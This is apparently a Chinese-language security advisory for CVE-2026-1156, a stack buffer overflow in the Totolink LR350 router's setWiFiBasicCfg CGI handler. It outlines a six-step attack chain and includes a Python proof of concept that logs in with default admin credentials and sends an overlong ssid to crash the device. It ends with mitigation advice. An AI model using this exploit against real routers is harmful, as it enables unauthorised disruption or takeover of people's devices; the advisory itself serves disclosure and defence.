CVE-2026-1156 Totolink LR350 setWiFiBasicCfg缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2026-1156

漏洞类型

缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Totolink LR350

漏洞概述

CVE-2026-1156是影响Totolink LR350路由器9.3.5u.6369_B20220309固件版本的高危安全漏洞。该漏洞位于Web管理界面的CGI接口文件中，具体为/cgi-bin/cstecgi.cgi程序中的setWiFiBasicCfg函数。攻击者可通过构造恶意的ssid参数值触发缓冲区溢出条件，从而可能实现远程代码执行或导致设备拒绝服务。由于该漏洞可通过网络远程利用，且CVSS评分达到8.8分（高危），对使用该设备的组织和个人构成严重安全威胁。漏洞已在互联网上公开披露，攻击代码可能被恶意利用，建议受影响用户立即采取防护措施。

技术细节

该漏洞属于典型的基于栈的缓冲区溢出问题。在Totolink LR350路由器的Web管理功能中，setWiFiBasicCfg函数负责处理WiFi基本配置参数。当处理用户输入的ssid（无线网络名称）参数时，程序未对输入数据长度进行充分验证直接将数据复制到固定大小的缓冲区中。攻击者可以通过发送超长的ssid字符串至/cgi-bin/cstecgi.cgi端点，覆盖相邻内存区域的返回地址和函数指针，进而控制程序执行流程。由于该CGI程序通常以高权限运行，成功的漏洞利用可获得设备的完全控制权。攻击者无需管理员权限即可触发该漏洞，但需要设备认证凭据进行身份验证后发送恶意请求。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标为Totolink LR350路由器，发现其Web管理接口位于/cgi-bin/cstecgi.cgi

STEP 2

Authentication

攻击者使用有效凭据登录路由器管理界面（默认凭据或已泄露凭据）

STEP 3

Payload Crafting

攻击者构造包含超长ssid参数的恶意请求，超出目标缓冲区容量

STEP 4

Exploitation

发送恶意请求到setWiFiBasicCfg函数，长字符串覆盖栈上的返回地址和关键指针

STEP 5

Code Execution

成功利用后攻击者获得设备最高权限，可执行任意系统命令

STEP 6

Persistence

攻击者安装后门、修改配置或建立持久化访问通道

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2026-1156 PoC - Totolink LR350 Buffer Overflow in setWiFiBasicCfg
Note: This PoC is for educational and security research purposes only.
"""

import requests
import sys

target_host = "http://192.168.10.1"  # Change to target router IP
login_url = f"{target_host}/cgi-bin/cstecgi.cgi"

# Prepare long ssid payload to trigger buffer overflow
# The exact overflow length depends on firmware version
buffer_size = 1024  # Adjust based on target
ssid_payload = "A" * buffer_size

def exploit_cve_2026_1156():
    """Exploit the buffer overflow in setWiFiBasicCfg function"""
    
    # Step 1: Login to the router
    login_data = {
        "topicurl": "login",
        "username": "admin",  # Default username
        "password": "admin"   # Default password
    }
    
    session = requests.Session()
    try:
        login_response = session.post(login_url, json=login_data, timeout=10)
        print(f"[+] Login attempt: {login_response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Login failed: {e}")
        return False
    
    # Step 2: Send malicious ssid payload to trigger overflow
    exploit_data = {
        "topicurl": "setWiFiBasicCfg",
        "ssid": ssid_payload,
        "enable": "1",
        "channel": "6",
        "mode": "802.11bgn"
    }
    
    try:
        response = session.post(login_url, json=exploit_data, timeout=10)
        print(f"[+] Exploit payload sent (length: {len(ssid_payload)})")
        print(f"[+] Response status: {response.status_code}")
        return True
    except Exception as e:
        print(f"[*] Request completed with: {e}")
        return True

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2026-1156 PoC - Totolink LR350 Buffer Overflow")
    print("=" * 60)
    exploit_cve_2026_1156()

影响范围

Totolink LR350 9.3.5u.6369_B20220309

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时措施：(1) 关闭路由器的远程管理功能，仅通过本地网络访问管理界面；(2) 修改默认管理员密码为强密码；(3) 使用防火墙限制对Web管理端口(80/443)的访问，仅允许受信任的IP地址；(4) 监控设备日志关注异常访问行为；(5) 如业务允许，考虑暂时更换为其他品牌路由器。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1156
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1156
3 Details https://www.cvedetails.com/cve/CVE-2026-1156/
4 VulDB https://vuldb.com/cve/CVE-2026-1156
5 Link https://lavender-bicycle-a5a.notion.site/TOTOLINK-LR350-setWiFiBasicCfg-2e453a41781f80a2ad43e85bf5d46659?source=copy_link
6 Link https://vuldb.com/?ctiid.341750
7 Link https://vuldb.com/?id.341750
8 Link https://vuldb.com/?submit.735722
9 Link https://www.totolink.net/